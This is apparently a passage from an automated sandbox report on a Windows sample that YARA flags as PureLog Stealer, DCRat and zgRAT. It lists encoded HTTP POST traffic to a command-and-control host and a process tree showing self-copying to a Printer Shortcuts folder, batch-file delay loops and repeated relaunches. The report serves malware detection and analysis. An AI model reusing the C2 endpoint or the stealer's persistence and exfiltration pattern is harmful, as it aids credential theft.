Dec 26, 2024 10:23:44.472975016 CET	667	IN	Data Raw: 75 4d 7b 07 76 5f 70 02 76 61 76 41 7f 5e 6a 03 74 62 75 01 75 5b 5e 0a 7f 6c 61 06 77 6c 68 07 7c 73 52 49 79 7c 5d 03 7b 60 72 06 7c 7d 70 08 74 77 68 07 7d 4c 6e 0d 7e 53 73 09 7b 53 5c 05 7d 5c 79 4d 7c 60 74 08 7c 52 52 43 7d 4e 52 41 7c 67 Data Ascii: uM{v_pvavA^jtbuu[^lawlh\|sRIy\|]{`r\|}ptwh}Ln~Ss{S\}\yM\|`t\|RRC}NRA\|gbMx}gx\xqw~wUON}@zM\|B}\^It]Wz_qvHp~vh@}Xmvb}by\|wPxHh\|sUuLitO}H\|_~}lx~gUuqw{L_~`iyg`Nxw\|{S{zLpH{]r{]NZ{gx~Lou_{\iRlX}wR@havRaB`lo\|HvpT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49943	104.21.38.84	80	1856	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe

Timestamp	Bytes transferred	Direction	Data
Dec 26, 2024 10:23:55.460490942 CET	342	OUT	POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 649521cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 26, 2024 10:23:55.808653116 CET	344	OUT	Data Raw: 00 01 04 0d 06 0b 04 06 05 06 02 01 02 0d 01 00 00 02 05 0f 02 06 03 0e 02 52 0c 01 05 0f 01 50 0d 06 03 01 01 01 04 55 0c 51 07 0a 07 56 07 00 03 00 0b 0b 0d 53 05 07 07 57 07 03 07 52 05 0d 00 0b 0f 0b 06 01 01 03 0c 57 0d 57 0d 04 0f 51 05 54 Data Ascii: RPUQVSWRWWQTPYRV\L~^j@tbjYaeP~\|r\vk]hMRDoBgzszS^cgs[u~V@xCr}\i
Dec 26, 2024 10:23:56.544862032 CET	25	IN	HTTP/1.1 100 Continue
Dec 26, 2024 10:23:56.883531094 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 09:23:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zvb4KixPyLBf5sUOkcHbmMoN0RAFPV%2Fc8AOQUyTRwZenDQgYogL8eI%2Fi52Lc8pITRqYjoKE6Fjv8LlVS4YKXJG44SSYTBD%2B7Nlnch%2FFMf4JM8qu8eOVfC6x53v3xWKirNn0XCID3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8003d56d3f42d8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4292&min_rtt=1605&rtt_var=5976&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=686&delivery_rate=63197&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 34 34 0d 0a 56 4a 7e 4d 6f 6e 63 49 78 5b 74 03 7c 5f 5a 5b 7c 67 7b 42 7c 5e 79 40 79 5d 6c 4c 7e 72 56 49 76 73 5b 0a 6d 5f 54 58 76 76 68 4a 69 5b 78 01 55 4b 71 42 77 4c 73 44 6b 5c 6a 5c 7c 01 69 54 6f 58 52 08 7d 70 7c 59 76 5c 71 07 77 58 6d 4a 7f 61 7d 5c 7d 42 70 08 7e 67 59 01 75 4c 7b 06 7c 5c 7d 4a 7e 5e 6d 49 7b 49 7f 5d 79 64 68 04 7b 43 68 5c 7a 4c 60 02 6c 5d 61 5f 7f 5e 5d 5e 79 64 6c 4a 7e 5b 7b 4e 76 07 6c 01 7a 51 41 5b 6b 67 7c 0d 7d 61 5f 4e 61 42 78 03 7b 7c 73 58 76 63 62 0c 79 5f 71 49 7d 7c 6a 4c 7a 61 5f 5a 77 73 78 58 75 58 7b 5b 77 61 7a 50 7e 5d 79 5f 77 62 6d 04 76 66 60 09 7f 52 65 05 77 6f 6c 04 7f 70 7c 00 6f 6f 73 03 6f 5e 66 02 6b 6d 5a 08 60 5e 7c 04 7e 62 54 09 7e 7d 6f 09 78 53 61 5f 7e 5c 5c 5d 7b 5d 46 51 7d 7c 51 50 7f 63 78 0a 7c 64 61 59 6c 43 7c 5a 7b 5c 7c 4b 7e 71 51 4b 69 77 67 0b 7c 70 57 41 7b 70 74 42 7e 5c 7c 46 74 70 61 51 7b 5c 79 02 77 66 60 03 7c 76 64 06 7d 76 5b 0c 77 62 55 07 7f 4c 79 4d 7d 67 6a 0c 7b 58 74 0c 7e 73 7b 4a 76 62 5b 06 74 [TRUNCATED] Data Ascii: 444VJ~MoncIx[t\|_Z[\|g{B\|^y@y]lL~rVIvs[m_TXvvhJi[xUKqBwLsDk\j\\|iToXR}p\|Yv\qwXmJa}\}Bp~gYuL{\|\}J~^mI{I]ydh{Ch\zL`l]a_^]^ydlJ~[{NvlzQA[kg\|}a_NaBx{\|sXvcby_qI}\|jLza_ZwsxXuX{[wazP~]y_wbmvf`Rewolp\|ooso^fkmZ`^\|~bT~}oxSa_~\\]{]FQ}\|QPcx\|daYlC\|Z{\\|K~qQKiwg\|pWA{ptB~\\|FtpaQ{\ywf`\|vd}v[wbULyM}gj{Xt~s{Jvb[tayOrK~RtN~YUJwa{I{ryJ~NqJxI^{w`BymsIy\lzsfNNlxIp}bQMual}\|}gZ}quuR`{lpIwpTzayH\|lb{aXuM{v_p
Dec 26, 2024 10:23:56.883552074 CET	659	IN	Data Raw: 76 61 76 41 7f 5e 6a 03 74 62 75 01 75 5b 5e 0a 7f 6c 61 06 77 6c 68 07 7c 73 52 49 79 7c 5d 03 7b 60 72 06 7c 7d 70 08 74 77 68 07 7d 4c 6e 0d 7e 53 73 09 7b 53 5c 05 7d 5c 79 4d 7c 60 74 08 7c 52 52 43 7d 4e 52 41 7c 67 62 4d 78 7d 67 01 78 5c Data Ascii: vavA^jtbuu[^lawlh\|sRIy\|]{`r\|}ptwh}Ln~Ss{S\}\yM\|`t\|RRC}NRA\|gbMx}gx\xqw~wUON}@zM\|B}\^It]Wz_qvHp~vh@}Xmvb}by\|wPxHh\|sUuLitO}H\|_~}lx~gUuqw{L_~`iyg`Nxw\|{S{zLpH{]r{]NZ{gx~Lou_{\iRlX}wR@havRaB`lo\|HvpTmOf]jlf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49964	104.21.38.84	80	3712	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe

Timestamp	Bytes transferred	Direction	Data
Dec 26, 2024 10:24:04.603971004 CET	360	OUT	POST /PipeToJavascriptRequestpollcpubasetestprivateTemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 649521cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 26, 2024 10:24:04.949470997 CET	344	OUT	Data Raw: 05 01 04 01 03 0f 04 06 05 06 02 01 02 0d 01 0b 00 02 05 0d 02 02 03 00 03 05 0c 03 07 0e 01 00 0a 01 04 5d 00 0c 05 0b 0d 0a 06 01 04 03 04 06 04 07 0f 59 0c 0e 06 07 06 00 06 04 04 07 04 58 00 0a 0a 00 04 07 07 07 0c 03 0f 07 0f 54 0d 06 04 02 Data Ascii: ]YXTRQ\L}T~p[^t~Xa[ZkUaBwBlh]`DlUgz`r\|TkP`Yw^~e~V@z}r~\W
Dec 26, 2024 10:24:05.688652992 CET	25	IN	HTTP/1.1 100 Continue
Dec 26, 2024 10:24:06.014471054 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 09:24:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nwYQWzhRBBryM5aiww%2FFlmSeGr3u1OvPD8EX%2FDEpetvBjDUZ7YNWM4uX8o0DuwCuzPl3qAd255Fqw4LvKzNZ9b%2Fiv6HZIcSL9DGSuvZC53cLdqr%2FXf9L8yT7dPvXqALk2gFchxXV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80040e9a51c472-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3761&min_rtt=1473&rtt_var=5129&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=704&delivery_rate=73804&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 34 34 0d 0a 56 4a 7e 4c 6f 53 6b 49 78 5b 74 00 68 62 68 5b 6a 59 6f 09 68 06 69 0c 6d 05 68 00 69 62 56 48 60 60 75 0a 79 61 76 5e 75 75 74 03 7d 61 78 01 55 4b 71 42 77 4c 73 44 6b 5c 6a 5c 7c 01 69 54 6f 58 52 08 7d 70 7c 59 76 5c 71 07 77 58 6d 4a 7f 61 7d 5c 7d 42 70 08 7e 67 59 01 75 4c 7b 06 7c 5c 79 04 69 5e 6a 5f 7b 49 5d 5c 6c 67 7c 4c 78 54 60 5b 6e 61 67 5a 6f 70 62 41 68 73 6c 06 7b 59 70 02 6a 62 67 07 76 5f 5e 04 7a 51 41 5b 6b 67 7c 0d 7d 61 5f 4e 61 42 78 03 7b 7c 73 58 76 63 62 0c 79 5f 71 49 7d 7c 6a 4c 7a 61 5f 5a 77 73 78 58 75 58 7b 5b 77 61 7a 50 7e 5d 79 5f 77 62 6d 04 76 66 60 09 7f 52 65 05 77 6f 6c 04 7f 70 7c 00 6f 6f 73 03 6f 5e 66 02 6b 6d 5a 08 60 5e 7c 04 7e 62 54 09 7e 7d 6f 09 78 53 61 5f 7e 5c 5c 5d 7b 5d 46 51 7d 7c 51 50 7f 63 78 0a 7c 64 61 59 6c 43 7c 5a 7b 5c 7c 4b 7e 71 51 4b 69 77 67 0b 7c 70 57 41 7b 70 74 42 7e 5c 7c 46 74 70 61 51 7b 5c 79 02 77 66 60 03 7c 76 64 06 7d 76 5b 0c 77 62 55 07 7f 4c 79 4d 7d 67 6a 0c 7b 58 74 0c 7e 73 7b 4a 76 62 5b 06 74 [TRUNCATED] Data Ascii: 444VJ~LoSkIx[thbh[jYohimhibVH``uyav^uut}axUKqBwLsDk\j\\|iToXR}p\|Yv\qwXmJa}\}Bp~gYuL{\|\yi^j_{I]\lg\|LxT`[nagZopbAhsl{Ypjbgv_^zQA[kg\|}a_NaBx{\|sXvcby_qI}\|jLza_ZwsxXuX{[wazP~]y_wbmvf`Rewolp\|ooso^fkmZ`^\|~bT~}oxSa_~\\]{]FQ}\|QPcx\|daYlC\|Z{\\|K~qQKiwg\|pWA{ptB~\\|FtpaQ{\ywf`\|vd}v[wbULyM}gj{Xt~s{Jvb[tayOrK~RtN~YUJwa{I{ryJ~NqJxI^{w`BymsIy\lzsfNNlxIp}bQMual}\|}gZ}quuR`{lpIwpTzayH\|lb{aXuM{v_p
Dec 26, 2024 10:24:06.014744043 CET	659	IN	Data Raw: 76 61 76 41 7f 5e 6a 03 74 62 75 01 75 5b 5e 0a 7f 6c 61 06 77 6c 68 07 7c 73 52 49 79 7c 5d 03 7b 60 72 06 7c 7d 70 08 74 77 68 07 7d 4c 6e 0d 7e 53 73 09 7b 53 5c 05 7d 5c 79 4d 7c 60 74 08 7c 52 52 43 7d 4e 52 41 7c 67 62 4d 78 7d 67 01 78 5c Data Ascii: vavA^jtbuu[^lawlh\|sRIy\|]{`r\|}ptwh}Ln~Ss{S\}\yM\|`t\|RRC}NRA\|gbMx}gx\xqw~wUON}@zM\|B}\^It]Wz_qvHp~vh@}Xmvb}by\|wPxHh\|sUuLitO}H\|_~}lx~gUuqw{L_~`iyg`Nxw\|{S{zLpH{]r{]NZ{gx~Lou_{\iRlX}wR@havRaB`lo\|HvpTmOf]jlf

Target ID:	0
Start time:	04:21:58
Start date:	26/12/2024
Path:	C:\Users\user\Desktop\67VB5TS184.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\67VB5TS184.exe"
Imagebase:	0xab0000
File size:	1'914'880 bytes
MD5 hash:	67247063BFBF3EEDFDFD183E8235A5E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2039311964.0000000000AB2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2074513502.00000000131FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:22:01
Start date:	26/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\EtVpSBU0kW.bat"
Imagebase:	0x7ff61cbe0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:22:01
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:22:01
Start date:	26/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff73d800000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:22:01
Start date:	26/12/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7ffdc0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:22:06
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\PrintHood\WinStore.App.exe"
Imagebase:	0x830000
File size:	1'914'880 bytes
MD5 hash:	67247063BFBF3EEDFDFD183E8235A5E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:22:10
Start date:	26/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rfQPUbaSjc.bat"
Imagebase:	0x7ff61cbe0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:22:10
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:22:10
Start date:	26/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff73d800000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:22:10
Start date:	26/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7fd080000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:22:19
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\PrintHood\WinStore.App.exe"
Imagebase:	0x600000
File size:	1'914'880 bytes
MD5 hash:	67247063BFBF3EEDFDFD183E8235A5E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	04:22:22
Start date:	26/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lRXC83nrKa.bat"
Imagebase:	0x7ff61cbe0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	04:22:22
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	04:22:22
Start date:	26/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff73d800000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	04:22:23
Start date:	26/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7fd080000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	04:22:32
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\PrintHood\WinStore.App.exe"
Imagebase:	0x880000
File size:	1'914'880 bytes
MD5 hash:	67247063BFBF3EEDFDFD183E8235A5E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	04:22:35
Start date:	26/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wtO4vJVMF8.bat"
Imagebase:	0x7ff61cbe0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	04:22:35
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	04:22:35
Start date:	26/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff73d800000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	04:22:36
Start date:	26/12/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7ffdc0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	04:22:41
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\PrintHood\WinStore.App.exe"
Imagebase:	0x5b0000
File size:	1'914'880 bytes
MD5 hash:	67247063BFBF3EEDFDFD183E8235A5E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	04:22:44
Start date:	26/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zd3m5m79sA.bat"
Imagebase:	0x7ff61cbe0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	04:22:44
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	04:22:44
Start date:	26/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff73d800000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	04:22:44
Start date:	26/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7fd080000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	04:22:53
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\PrintHood\WinStore.App.exe"
Imagebase:	0xa80000
File size:	1'914'880 bytes
MD5 hash:	67247063BFBF3EEDFDFD183E8235A5E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	04:22:57
Start date:	26/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HY3kVmQ00V.bat"
Imagebase:	0x7ff61cbe0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	04:22:57
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	04:22:57
Start date:	26/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff73d800000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	04:22:57
Start date:	26/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7fd080000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	04:23:07
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\PrintHood\WinStore.App.exe"
Imagebase:	0x8b0000
File size:	1'914'880 bytes
MD5 hash:	67247063BFBF3EEDFDFD183E8235A5E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	04:23:10
Start date:	26/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2ucUGghGnf.bat"
Imagebase:	0x7ff61cbe0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	04:23:10
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	04:23:10
Start date:	26/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff73d800000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	04:23:10
Start date:	26/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7fd080000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	04:23:19
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\PrintHood\WinStore.App.exe"
Imagebase:	0xe10000
File size:	1'914'880 bytes
MD5 hash:	67247063BFBF3EEDFDFD183E8235A5E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	04:23:22
Start date:	26/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Q8sISb3ARb.bat"
Imagebase:	0x7ff61cbe0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
